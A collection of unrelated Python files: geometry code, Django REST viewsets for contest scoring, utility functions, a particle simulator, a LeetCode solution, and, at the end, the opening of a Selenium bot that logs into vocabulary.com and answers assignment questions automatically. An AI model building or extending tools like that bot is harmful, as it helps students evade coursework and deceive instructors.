dictDevelopp2D["fdist3DMilBas"] = endroit3DMil.dist3d(endroit3DBas)
endroit3DHautChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DHaut))
dictDevelopp2D["fdist3DMilHautChainette"] = endroit3DMil.dist3d(endroit3DHautChainette)
endroit3DBasChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DBas))
dictDevelopp2D["fdist3DMilBasChainette"] = endroit3DMil.dist3d(endroit3DBasChainette)
else:
# aux autres tours
# on s'intéresse à millieu, haut, bas, hautchainette, baschainette
dictDevelopp2D["fdist3DMilMil"] = self.endroit3DMil.dist3d(endroit3DMil)
dictDevelopp2D["fdist3DHautMil"] = self.endroit3DHaut.dist3d(endroit3DMil)
dictDevelopp2D["fdist3DMilHaut"] = self.endroit3DMil.dist3d(endroit3DHaut)
dictDevelopp2D["fdist3DHautHaut"] = self.endroit3DHaut.dist3d(endroit3DHaut)
dictDevelopp2D["fdist3DMilBas"] = self.endroit3DMil.dist3d(endroit3DBas)
dictDevelopp2D["fdist3DBasBas"] = self.endroit3DBas.dist3d(endroit3DBas)
endroit3DHautChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DHaut))
dictDevelopp2D["fdist3DMilHautChainette"] = self.endroit3DMil.dist3d(endroit3DHautChainette)
dictDevelopp2D["fdist3DHautHautChainette"] = self.endroit3DHaut.dist3d(endroit3DHautChainette)
endroit3DBasChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DBas))
dictDevelopp2D["fdist3DMilBasChainette"] = self.endroit3DMil.dist3d(endroit3DBasChainette)
dictDevelopp2D["fdist3DBasBasChainette"] = self.endroit3DBas.dist3d(endroit3DBasChainette)
# on lance le calcul dans l'espace 2D
Developp2D.comp(self, dictDevelopp2D=dictDevelopp2D)
# on sauvegarde les points pour le tour suivant
self.endroit3DMil = endroit3DMil
self.endroit3DHaut = endroit3DHaut
self.endroit3DBas = endroit3DBas
#-----
def __str__(self) -> str:
strMsg = f'--> Developp :\n'
return strMsg
#----- start here
if __name__ == '__main__':
import doctest
(failureCount, testCount) = doctest.testmod(verbose=False)
print(f'nombre de tests : {testCount:>3d}, nombre d\'erreurs : {failureCount:>3d}', end='')
if failureCount != 0:
print(f' --> Arrêt du programme {pathlib.Path(__file__)}')
sys.exit(ABNORMAL_TERMINATION)
else:
print(f' --> All Ok {pathlib.Path(__file__)}')
sys.exit(NORMAL_TERMINATION)
|
"""PPOPT INIT FILE - todo fill in."""
|
def dict_get(mydict, list_keys, default=None):
assert isinstance(mydict, dict)
assert isinstance(list_keys, (list, tuple))
num_keys = len(list_keys)
if num_keys == 1:
return mydict.get(list_keys[0], default)
elif list_keys[0] not in mydict:
return default
else:
return dict_get(mydict[list_keys[0]], list_keys[1:], default)
def dict_set(mydict, list_keys, value):
assert isinstance(mydict, dict)
assert isinstance(list_keys, (list, tuple))
assert len(list_keys) > 0
if len(list_keys) == 1:
mydict[list_keys[0]] = value
return
dict_set(mydict.setdefault(list_keys[0], dict()), list_keys[1:], value)
def dict_has_keys(mydict, list_keys):
"""
check if specified dict has nested keys defined by list_keys
:param mydict:
:param list_keys:
:return: check if specified dict has nested keys like: mydict[list_keys[0]][list_keys[1]] ...
"""
assert isinstance(list_keys, (list, tuple))
if not isinstance(mydict, dict):
return False
if len(list_keys) == 1:
return list_keys[0] in mydict
if list_keys[0] in mydict:
return dict_has_keys(mydict[list_keys[0]], list_keys[1:])
else:
return False
|
import sys
H, W, h, w = map(int, sys.stdin.read().split())
def main():
res = H * W - (h*W + H*w - h*w)
print(res)
if __name__ == '__main__':
main()
|
# Standard Library
import logging
import re
import uuid
# Third-Party
import pydf
import json
from rest_framework_json_api.filters import OrderingFilter
from rest_framework_json_api.django_filters import DjangoFilterBackend
from django_fsm import TransitionNotAllowed
from dry_rest_permissions.generics import DRYPermissions
from rest_framework import status
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.permissions import AllowAny
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
# Django
from django.apps import apps
from django.core.files.base import ContentFile
from django.db.models import Sum, Q, Avg
from django.template.loader import render_to_string
from django.utils.text import slugify
from django.utils.six import BytesIO
from collections.abc import Iterable
from django.contrib.auth import get_user_model
# Local
# from .filterbackends import AppearanceFilterBackend
# from .filterbackends import OutcomeFilterBackend
# from .filterbackends import ScoreFilterBackend
# from .filterbackends import SongFilterBackend
from .filtersets import RoundFilterset
from .filtersets import ScoreFilterset
from .models import Appearance
from .models import Outcome
from .models import Panelist
from .models import Round
from .models import Score
from .models import Song
from apps.bhs.models import Convention
from .renderers import PDFRenderer
from .renderers import XLSXRenderer
from .renderers import DOCXRenderer
from .renderers import RTFRenderer
from .responders import PDFResponse
from .responders import XLSXResponse
from .responders import DOCXResponse
from .responders import RTFResponse
from .serializers import AppearanceSerializer
from .serializers import OutcomeSerializer
from .serializers import PanelistSerializer
from .serializers import RoundSerializer
from .serializers import ScoreSerializer
from .serializers import SongSerializer
log = logging.getLogger(__name__)
from rest_framework.negotiation import BaseContentNegotiation
class IgnoreClientContentNegotiation(BaseContentNegotiation):
def select_parser(self, request, parsers):
"""
Select the first parser in the `.parser_classes` list.
"""
return parsers[0]
def select_renderer(self, request, renderers, format_suffix):
"""
Select the first renderer in the `.renderer_classes` list.
"""
return (renderers[0], renderers[0].media_type)
class AppearanceViewSet(viewsets.ModelViewSet):
queryset = Appearance.objects.select_related(
'round',
# 'group',
# 'entry',
).prefetch_related(
'owners',
'songs',
# 'statelogs',
).order_by('id')
serializer_class = AppearanceSerializer
filterset_class = None
filter_backends = [
DjangoFilterBackend,
# AppearanceFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "appearance"
def perform_create(self, serializer):
Chart = apps.get_model('bhs.chart')
group_id = serializer.initial_data['group_id']
charts_raw = Chart.objects.filter(
groups__id=group_id,
).values(
'id',
'title',
'arrangers',
).order_by('title')
for c in charts_raw:
c['pk'] = str(c.pop('id'))
charts = [json.dumps(x) for x in charts_raw]
# print("add participants...")
serializer.save(charts=charts)
@action(methods=['get'], detail=True)
def mock(self, request, pk=None, **kwargs):
"""
Mocks an Appearance using fake data.
"""
object = self.get_object()
object.mock()
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def start(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.start(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def finish(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.finish(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def verify(self, request, pk=None, **kwargs):
object = self.get_object()
# For Choruses, ensure a valid number of participants on stage has been entered.
if object.kind == object.KIND.chorus and (object.pos is None or object.pos < 8):
return Response(
{'status': 'Please enter a valid number of Participants on stage.'},
status=status.HTTP_400_BAD_REQUEST,
)
try:
object.verify(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete. Unable to verify appearance. Check entered scores.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def complete(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.complete(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def advance(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.advance(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def scratch(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.scratch(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def disqualify(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.disqualify(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def variance(self, request, pk=None):
appearance = Appearance.objects.get(pk=pk)
# if appearance.variance_report:
# pdf = appearance.variance_report.file
# else:
pdf = appearance.get_variance()
file_name = '{0} Variance Report.pdf'.format(appearance)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def csa(self, request, pk=None):
"""
Renders the Competitor Scoring Analysis in PDF
"""
appearance = Appearance.objects.get(pk=pk)
# if appearance.csa_report:
# pdf = appearance.csa_report.file
# else:
pdf = appearance.get_csa()
file_name = '{0} CSA.pdf'.format(appearance)
file_name = re.sub('[^a-zA-Z0-9_ ]', '', file_name)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
class OutcomeViewSet(viewsets.ModelViewSet):
queryset = Outcome.objects.select_related(
'round',
# 'award',
).prefetch_related(
'statelogs',
).order_by('id')
serializer_class = OutcomeSerializer
filter_backends = [
DjangoFilterBackend,
# OutcomeFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "outcome"
class PanelistViewSet(viewsets.ModelViewSet):
queryset = Panelist.objects.select_related(
'round',
# 'user',
).prefetch_related(
'scores',
).order_by('id')
serializer_class = PanelistSerializer
filter_backends = [
DjangoFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "panelist"
def perform_create(self, serializer):
if serializer.initial_data['category'] == Panelist.CATEGORY.ca:
#
# Add CA as owner of Round, Session, and Convention
#
person_id = serializer.initial_data['person_id']
Person = apps.get_model('bhs.person')
person = Person.objects.get(pk=person_id)
User = get_user_model()
owner = User.objects.filter(email=person.email).first()
# Parent round to access session ID
parent_round = Round.objects.get(pk=serializer.initial_data['round']['id'])
# Session
Session = apps.get_model('registration.session')
session = Session.objects.get(pk=parent_round.session_id)
session.owners.add(owner.id)
# Rounds under session
rounds = Round.objects.filter(
session_id=session.id
)
for round in rounds:
round.owners.add(owner.id)
# Convention
convention = Convention.objects.get(pk=session.convention_id)
convention.owners.add(owner.id)
# Save Panelist record
serializer.save()
def partial_update(self, request, pk=None):
# Current object
object = self.get_object()
if type(request.data['airports']) == str:
print("airports is string")
request.data.pop('airports')
try:
# Submitted number...
serializer = self.get_serializer(data=request.data)
serializer.is_valid()
## See if the submitted number already exists
if (Panelist.objects.filter(
num=request.data['num'],
round_id=object.round_id,
).count()):
raise ValueError()
# Update Panelist
return super().partial_update(request, *pk)
except ValueError as e:
return Response(
{'status': 'Number is already in use by another judge.'},
status=status.HTTP_400_BAD_REQUEST,
)
def perform_destroy(self, instance):
print("perform_destroy function", instance.id)
if instance.category == Panelist.CATEGORY.ca:
#
# Remove CA as owner of Round, Session, and Convention
#
Person = apps.get_model('bhs.person')
person = Person.objects.get(pk=instance.person_id)
User = get_user_model()
owner = User.objects.filter(email=person.email).first()
# Round
parent_round = Round.objects.get(pk=instance.round_id)
# Session
Session = apps.get_model('registration.session')
session = Session.objects.get(pk=parent_round.session_id)
session.owners.remove(owner.id)
# Parent round to access session ID
rounds = Round.objects.filter(
session_id=session.id
)
for round in rounds:
round.owners.remove(owner.id)
# Convention
convention = Convention.objects.get(pk=session.convention_id)
convention.owners.remove(owner.id)
print("CA removed as owner")
# Remove Panelist record
return super().perform_destroy(instance)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def psa(self, request, pk=None):
panelist = Panelist.objects.get(pk=pk)
# if panelist.psa_report:
# pdf = panelist.psa_report.file
# else:
pdf = panelist.get_psa()
file_name = '{0} PSA.pdf'.format(panelist)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
class RoundViewSet(viewsets.ModelViewSet):
queryset = Round.objects.select_related(
# 'session',
).prefetch_related(
'owners',
'appearances',
# 'appearances__owners',
# 'appearances__songs',
# 'panelists__scores',
# 'outcomes__award',
).order_by('id')
serializer_class = RoundSerializer
filterset_class = RoundFilterset
filter_backends = [
DjangoFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "round"
@action(methods=['get'], detail=True)
def mock(self, request, pk=None, **kwargs):
object = self.get_object()
object.mock()
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def reset(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.reset(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def build(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.build(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def start(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.start(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def complete(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.complete(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def finalize(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.finalize(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def publish(self, request, pk=None, **kwargs):
object = self.get_object()
# try:
# object.publish(by=self.request.user)
# except TransitionNotAllowed:
# return Response(
# {'status': 'Information incomplete.'},
# status=status.HTTP_400_BAD_REQUEST,
# )
object.publish(by=self.request.user)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def oss(self, request, pk=None):
round = Round.objects.select_related(
# 'session',
# 'session__convention',
).get(pk=pk)
# if round.oss_report:
# pdf = round.oss_report.file
# else:
pdf = round.get_oss(request.user.name)
file_name = '{0} OSS.pdf'.format(round)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def legacy(self, request, pk=None):
round = Round.objects.get(pk=pk)
if round.legacy_oss:
pdf = round.legacy_oss.file
else:
pdf = round.get_legacy_oss()
file_name = '{0} Legacy OSS.pdf'.format(round)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def legacyoss(self, request, pk=None):
round = Round.objects.select_related(
).get(pk=pk)
# if round.legacy_oss:
# pdf = round.legacy_oss.file
# else:
pdf = round.get_legacy_oss()
file_name = '{0} Legacy OSS.pdf'.format(round)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def titles(self, request, pk=None):
round = Round.objects.prefetch_related(
'appearances',
).get(pk=pk)
pdf = round.get_titles()
file_name = '{0} Titles Report'.format(
round.nomen,
)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[PDFRenderer],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def sa(self, request, pk=None):
round = Round.objects.select_related(
# 'session',
# 'session__convention',
).get(pk=pk)
# if round.sa_report:
# pdf = round.sa_report.file
# else:
pdf = round.get_sa(request.user.name)
file_name = '{0} SA'.format(
round.nomen,
)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
DOCXRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def announcements(self, request, pk=None):
round = Round.objects.select_related(
).get(pk=pk)
docx = round.get_announcements()
file_name = '{0} Announcements'.format(
round.nomen,
)
return DOCXResponse(
docx,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['post'],
detail=True,
renderer_classes=[
RTFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def labels(self, request, pk=None, **kwargs):
round = self.get_object()
# Parse inbound request
if len(request._request.body):
content = BytesIO(request._request.body)
data = JSONParser().parse(content)
else:
data = {}
convention = Convention.objects.filter(
id=round.convention_id
).first()
# File name postfix
postfix = ""
if len(data):
postfix = "_" + data['postfix'].strip()
rtf = round.get_labels(request, data)
### Concatenate File name
file_name = '{0}_Lbls{1}'.format(
convention.base_filename(),
postfix
)
return RTFResponse(
rtf,
file_name=file_name,
status=status.HTTP_200_OK
)
class ScoreViewSet(viewsets.ModelViewSet):
queryset = Score.objects.select_related(
'song',
'song__appearance',
'song__appearance__round',
'panelist',
).prefetch_related(
).order_by('id')
serializer_class = ScoreSerializer
filterset_class = ScoreFilterset
filter_backends = [
DjangoFilterBackend,
# ScoreFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "score"
def partial_update(self, request, pk=None):
object = self.get_object()
# Update Score
super().partial_update(request, *pk)
# Reset appearance status???
appearance = Appearance.objects.filter(
id=object.song.appearance.id
)
# Update appearance stats
stats = appearance[0].get_stats()
appearance.update(
status=Appearance.STATUS.finished,
stats=stats
)
# Resave score for return
return super().partial_update(request, *pk)
class SongViewSet(viewsets.ModelViewSet):
queryset = Song.objects.select_related(
'appearance',
).prefetch_related(
'scores',
'scores__panelist',
).order_by('id')
serializer_class = SongSerializer
filterset_class = None
filter_backends = [
DjangoFilterBackend,
# SongFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "song"
|
# Modifique o programa para exibir os números de 50 a 100
n = 50
while n <= 100:
print(n)
n += 1
|
import logging
import time
import uuid
from db.DAO import DAO
from db.DBEngine import DBEngine
from AppConfig import db_config
from bson import json_util
import json
logger = logging.getLogger(__name__)
class ProfilerController:
@classmethod
def get_investor(cls,id):
DBEngine.create_db_engine()
response = DAO.get_investor(id)
logger.info(response)
return response
@classmethod
def add_investor(cls,res):
DBEngine.create_db_engine()
response = DAO.add_new_investor(res)
logger.info(response)
return response
def gen_id():
id = uuid.uuid1()
final_id = id.hex
return final_id
def parse_json(data):
return json.loads(json_util.dumps(data))
|
class BaseError(Exception):
def __repr__(self):
return '<BaseError>'
class HandlerTypeError(BaseError):
def __init__(self, name):
self.name = name
self.message = 'Handler function "%s" should be a coroutine.' % self.name
def __repr__(self):
return '<HandlerTypeError(name=%s)>' % self.name
|
from cipher_ajz2123 import __version__
from cipher_ajz2123 import cipher_ajz2123
def test_version():
assert __version__ == '0.1.0'
def test_cipher():
example = 'abc'
shift = 5
expected = 'fgh'
actual = cipher_ajz2123.cipher(example, shift)
assert actual == expected
|
import cv2 as cv
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
img = cv.imread('data/pic1.jpg')
colors = ('b', 'g', 'r')
for i, col in enumerate(colors):
hist = cv.calcHist([img], [i], None, [256], [0, 256])
mpl.use('tkagg')
x = np.arange(256)
plt.plot(x, hist, color = col)
plt.title('Color Histogram')
plt.xlabel('Bins')
plt.ylabel('# of pixels')
plt.show()
|
import numpy as np
import pandas as pd
class particle_system:
'''
Keep's track of the system's size, state and the particels in it
Constructor takes a list of length equal to the system's dimension
For [d1,d2,...,dk] the domain on which the particle can move is [0,d1]x[0,d2]x ... x[0,dk]
'''
def __init__(self,grid,creation):#grid : array of length equal to dimension
self.grid=grid
self.particles=[]
self.dim=len(self.grid)
self.max_id=0
self.__class__.creation=creation
'''
n : number of particles to insert
update_pos : a function which is passed to the constructor of particle, used for evolving it in time (see description of particle class for details)
update_intensity : as above
start_pos : if None, then generates randomly, otherwise a list of length n containing the initial positions as lists of length self.dim
intensity : if None, then set to 1, otherwise a list of length n
'''
def insert_particles(self,n,update_pos,update_intensity,start_pos=None,intensity=None):
if start_pos is None:
pos_data=[np.random.uniform(low=0, high=self.grid[i], size=n) for i in range(self.dim)]
start_pos=[[pos_data[j][i] for j in range(self.dim)]for i in range(n)]
if intensity is None:
intensity=[1 for i in range(n)]
for i in range(n):
self.particles.append(particle(self.grid,start_pos[i],update_pos,intensity[i],update_intensity,id=self.max_id+i))
self.max_id+=n
'''
updates the state of each particle in the system
'''
def evolve(self,dt):
for p in self.particles:
p.evolve(dt)
if p.intensity==0:#remove if intensity drops to 0
self.particles.remove(p)
self.creation(dt)
def positions(self):
return [p.pos for p in self.particles]
def intensities(self):
return [p.intensity for p in self.particles]
class particle:
'''
grid : as in particle_system
start_pos : initial position in a list
update_pos : assigned as a method of the class so the arguments it takes are : instance of class particle, time increment
intenisty : initial intensity
update_intsnity : as in update_pos. Note that the current method to make a particle vanish is to set its intensity to 0 so this method should handle that
'''
def __init__(self,grid,start_pos,update_pos,intensity,update_intensity,id):
self.grid=grid#dimensions of the space it's restricted to
self.dim=len(self.grid)
self.pos=start_pos#current position
self.__class__.update_pos=update_pos
self.intensity=intensity#current intensity
self.__class__.update_intensity = update_intensity
self.id=id
def evolve(self,dt):
self.pos=self.update_pos(dt)
self.intensity=self.update_intensity(dt)
'''
checks if a point is contained in a grid
'''
def inside_grid(pos,grid):#assume grid has leftmost bottom corner in 0, check if a given point is inisde of it
inside_dimensions=[pos[i]>=0 and pos[i]<=grid_dim for i,grid_dim in enumerate(grid)]
return all(inside_dimensions)
'''
brownian motion of a single particle in n dimensions
part : particle
dt: time increment
D : diffusion coefficient
drift : list of length equal to dimension if we want to have a drift in the motion
Note that when passing this to a constructor we need to specify the D and drift parameter with a lambda i.e.
pass lambda x,y : brownian_update(x,y,some_D,some_drift)
'''
def brownian_update(part,dt,D,drift=None):
if drift is None:
drift=[0]*part.dim
mean=[dt*d for d in drift]
cov=np.identity(part.dim)*dt*D*2#the 2 term appears because I think that's the 'true' variance formula in Brownian motion but D may as well just be any number, not the diffusion coeff
dr = np.random.multivariate_normal(mean, cov, 1).T
if (any([np.abs(dr[i][0])>grid_dim/2 for i,grid_dim in enumerate(part.grid)])):#this is just bad code but we're unlikely to need more dimensions anytime soon
print("The time step in brownian motion seems to be too large relative to grid size")#just to see if I'm doing anything stupid
pos=part.pos
new_pos=list(map(sum, zip(pos, [dr[i][0] for i,d in enumerate(dr)])))
if inside_grid(new_pos,part.grid):
return new_pos
else:#need to figure out where and when it intersects the boundary. For now let's just resample
return brownian_update(part,dt,D,drift)
'''
Takes an output file of thunderstorm in csv, frame number (starting from 1), and returns two lists of positions and intensities of every observed particles in a given frame
'''
def thunderstorm_extract(directory,frame_id):
df=pd.read_csv(directory)
frame=df.loc[df['frame'] == frame_id]
data=frame[['x [nm]','y [nm]','intensity [photon]']]
pos=[]
intensity=[]
for row in data.iterrows():
pos.append([row[1][0],row[1][1]])
intensity.append(row[1][2])
return pos,intensity
def placeholder_intensity_update(part,dt,mean,variance=None,threshold=None):
if variance is None:
variance=(dt)**2
if threshold is None:
threshold=0.1*mean#if intensity drops below then it disappears
#print(mean,variance,part.intensity)
intensity_change=np.random.normal(mean-part.intensity, variance)
new_int=part.intensity+intensity_change
#print(part.intensity)
if new_int<threshold:
new_int=0
return new_int
|
# 2021 June 5 10:13 - 10:59
# Intuitively, we need to do cN // 26, and take the remainder and see which char
# it corresponds to. However, there is an intricacy:
#
# cN % 26 gives us a number in [0, 25], what we want would be something in [1,
# 26].
#
# Notice here we should not simply add 1 to this [0, 25] result, as that
# effectively alters the mapping: for something that gives us 0 on the first
# digit, we should make it 26 and map it to "Z", instead of having it added by
# 1 and mapped to "A".
#
# So the correct way to go about it, is to tear down a 26 from the quotient and
# make the remainder 26, in case when cN % 26 == 0. Now the quot. and rem get
# altered from (cN // 26, 0) to (cN // 26 - 1, 26).
# The rest is to offset the ascii value of "A" by 1, and break at a proper time.
class Solution:
def convertToTitle(self, columnNumber: int) -> str:
ans = ""
while True:
if columnNumber % 26 != 0:
columnNumber, rem = columnNumber // 26, columnNumber % 26
else:
columnNumber, rem = columnNumber // 26 - 1, 26
ans = chr(rem + ord("A") - 1) + ans
if columnNumber < 1: break
return ans
if __name__ == "__main__":
print(Solution().convertToTitle(1))
print(Solution().convertToTitle(28))
print(Solution().convertToTitle(701))
print(Solution().convertToTitle(2147483647))
|
# -*- coding: utf-8 -*-
__version__ = "1.2.4"
import os
import platform
from selenium import webdriver
import time
from unidecode import unidecode
import urllib2
import httplib
import json
import sys
import speech_recognition as sr
import audioop
import urllib
from update import update
from pydub import AudioSegment
from bs4 import BeautifulSoup
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from os import path
_author_ = "Sayan Bhowmik and lefela4(Felix)"
fo = open('cred')
fo_ = open('voclist')
r = sr.Recognizer()
html = ''
skipAudio = 0
tries = 0
chrome_options = webdriver.ChromeOptions()
chrome_options.add_experimental_option(
"excludeSwitches", ["ignore-certificate-errors"])
check_driver_version = 1
driver = webdriver.Chrome(chrome_options=chrome_options)
#driver = webdriver.Firefox(capabilities=firefox_capabilities,firefox_binary=binary, firefox_options = opts)
#====================================================================================================================================================#
login_page = "https://www.vocabulary.com/login/"
my_username = fo.readlines()[0]
fo.seek(0, 0)
my_pass = fo.readlines()[1]
############################################################################
# Link to assignment [For Demo]
url = fo_.readlines()[0] #YOUR URL HERE
##############################################################################
print "Voc at " + url
a_page = url
lastAudioLen = 0
print "[+] STARTING VOCABULARY BOT"
usr = ""
base = ""
old_html = ""
source = ""
soup = ""
op1 = ""
op2 = ""
op3 = ""
op4 = ""
options = []
word = ""
#====================================================================================================================================================#
def main():
'''
# Ignore this section, I actually ended up making a keygen to protect it from the hands of students at my University
ck = 0
if(platform.system() == "Linux" or platform.system() == "Darwin" and len(key) >= 10 and ck == 0):
base = platform.uname()[0][0]
usr = platform.uname()[1][0]
u = key[-2:][0]
b = key[-2:][1]
if(usr == u and base == b):
time.sleep(2)
login();
assignment();
ck += 1
if(platform.system() == "Windows" and len(key) >= 10 and ck == 0):
usr = os.getenv('username')[2]
base = platform.uname()[0][0]
u = key[-2:][0]
b = key[-2:][1]
if(usr == u and base == b):
time.sleep(2)
login();
assignment();
ck += 1
'''
time.sleep(2)
login()
assignment()
#====================================================================================================================================================#
def login():
driver.get(login_page)
time.sleep(3)
print "Attemp to login in"
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
username.send_keys(my_username)
password.send_keys(my_pass)
driver.find_element_by_class_name("green").click()
time.sleep(1)
try:
alertObj = driver.switch_to.alert
alertObj.accept()
print "Alert detected!"
driver.get(url)
except Exception as e:
print("No alert found!")
#====================================================================================================================================================#
def assignment():
try:
alertObj = driver.switch_to.alert
alertObj.accept()
print "Alert detected!"
driver.get(url)
except Exception as e:
print("No alert found!")
time.sleep(3)
driver.get(a_page)
time.sleep(2)
driver.execute_script("window.scrollTo(100, 100);")
option_high_score = scrapper()
click_op(option_high_score)
print "[+] STARTING VOCABULARY BOT [1]"
print "\a\a\a\a\a\a\a"
#====================================================================================================================================================#
def speech_to_text(audio):
song = AudioSegment.from_mp3("audio.mp3")
song.export("audio.wav", format="wav") # Is the same as:
time.sleep(2)
with sr.AudioFile("audio.wav") as source:
audio = r.record(source)
try:
text = r.recognize_google(audio)
print("You said " + text)
if(text == "tents"):
text = "dense"
if(text == "Tents"):
text = "dense"
if(text == "Bode"):
text = "mode"
if(text == "lute"):
text = "loot"
if(text == "heroin"):
text = "harrowing"
if(text == "and you were"):
text = "inure"
return text
except sr.UnknownValueError:
print("Could not understand audio")
except sr.RequestError as e:
print("Could not request results; {0}".format(e))
def scrapper():
try:
alertObj = driver.switch_to.alert
alertObj.accept()
print "Alert detected!"
driver.get(url)
except Exception as e:
print("No alert found!")
driver.execute_script("""window.location.reload();""")
time.sleep(2)
global html
global source
global old_html
global soup
